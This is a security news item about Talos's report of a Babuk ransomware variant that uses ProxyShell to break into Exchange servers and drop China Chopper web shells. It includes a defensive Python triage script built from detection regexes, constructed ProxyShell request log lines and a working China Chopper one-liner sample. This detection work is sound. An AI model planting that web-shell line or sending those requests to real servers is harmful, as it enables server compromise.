Cisco Talos reports new variant of Babuk ransomware targeting Exchange servers (Security News, November 2021)
A new threat actor, tracked by Talos as Tortilla, is running the campaign, and most of the affected users are in the U.S. Cisco Talos has issued a warning to U.S. companies about a new variant of the Babuk ransomware.
Security researchers Chetan Raghuprasad, Vanja Svajcer and Caitlin Huey describe the new threat in a Talos Intelligence blog post.
The researchers assess that the initial infection vector is exploitation of the ProxyShell vulnerabilities in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), followed by deployment of a China Chopper web shell on the compromised server.
The .NET executable version of the initial downloader is a modified variant of the EfsPotato exploit (a Windows local privilege-escalation technique that abuses the MS-EFSR interface) with added code to download and trigger the next stage.
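The two earliest artefacts a defender can look for in this chain are the ProxyShell path-confusion requests in the Exchange IIS logs and the China Chopper one-liner dropped on disk. The following triage script is an added example written for this page, not code from Talos or from the report; the IIS log lines, the web-shell text and the field layout are constructed, and the ProxyShell request pattern is a heuristic (a request to `autodiscover.json` whose query begins with `@` and re-embeds `autodiscover.json` in the `Email` parameter), not a complete exploit signature.

```python
"""Triage helpers for the ProxyShell -> China Chopper stage.

Added example for this page; the sample IIS log and web-shell text below
are constructed, not taken from the Talos report.
"""
from __future__ import annotations

import re
from pathlib import Path

# Classic ASPX China Chopper one-liner: eval() over a request parameter,
# executed in "unsafe" mode. Whitespace and quote variants are tolerated.
CHOPPER_RE = re.compile(
    r'eval\s*\(\s*Request\.Item\s*\[\s*["\']?\w+["\']?\s*\]\s*,\s*["\']unsafe["\']',
    re.IGNORECASE,
)

# ProxyShell path-confusion marker (heuristic): the Email parameter carries
# another autodiscover.json reference followed by "@<host>".
PROXYSHELL_EMAIL_RE = re.compile(
    r"email=autodiscover/autodiscover\.json(%3f|\?)@", re.IGNORECASE
)


def is_china_chopper(source: str) -> bool:
    """True if the page source contains the China Chopper eval pattern."""
    return bool(CHOPPER_RE.search(source))


def scan_webshells(root: Path, suffixes=(".aspx", ".ashx", ".asmx")) -> list[Path]:
    """Walk a web root (e.g. the Exchange FrontEnd directory) for web shells."""
    hits: list[Path] = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            try:
                text = p.read_text(errors="ignore")
            except OSError:
                continue
            if is_china_chopper(text):
                hits.append(p)
    return hits


def parse_w3c(lines):
    """Yield one dict per IIS W3C extended log record, keyed by #Fields names."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated record; skip rather than mis-key
        yield dict(zip(fields, values))


def find_proxyshell(lines) -> list[dict]:
    """Return log records that look like ProxyShell path-confusion requests."""
    hits = []
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "")
        if (
            stem.endswith("/autodiscover/autodiscover.json")
            and query.startswith("@")
            and PROXYSHELL_EMAIL_RE.search(query)
        ):
            hits.append(rec)
    return hits


# Constructed sample data (field subset chosen for brevity; real IIS logs
# carry more columns, which parse_w3c handles via the #Fields header).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-10-12 09:14:03 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2021-10-12 09:14:09 10.0.0.5 POST /autodiscover/autodiscover.json @test.local/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.local 443 - 203.0.113.7 python-requests/2.26 200
2021-10-12 09:14:10 10.0.0.5 POST /autodiscover/autodiscover.json @test.local/PowerShell/?&Email=autodiscover/autodiscover.json%3F@test.local 443 - 203.0.113.7 python-requests/2.26 200
2021-10-12 09:15:00 10.0.0.5 GET /autodiscover/autodiscover.json - 443 DOMAIN\\user 10.0.0.21 Outlook 200
"""

SAMPLE_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>'

if __name__ == "__main__":
    for rec in find_proxyshell(SAMPLE_LOG.splitlines()):
        print("ProxyShell-like request:", rec["c-ip"], rec["cs-uri-query"])
    print("China Chopper sample detected:", is_china_chopper(SAMPLE_SHELL))
```

In an incident, run `scan_webshells` against the Exchange FrontEnd and ClientAccess directories and `find_proxyshell` over the `u_ex*.log` files from the Default Web Site; a hit from either confirms the first two stages of the chain described above and tells you where to look for the downloader that follows.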
The Cisco Talos post has details on each phase and tool in the attack.
The researchers note that the Babuk builder and its source code were leaked in July, and that the Tortilla actor has been experimenting with different payloads.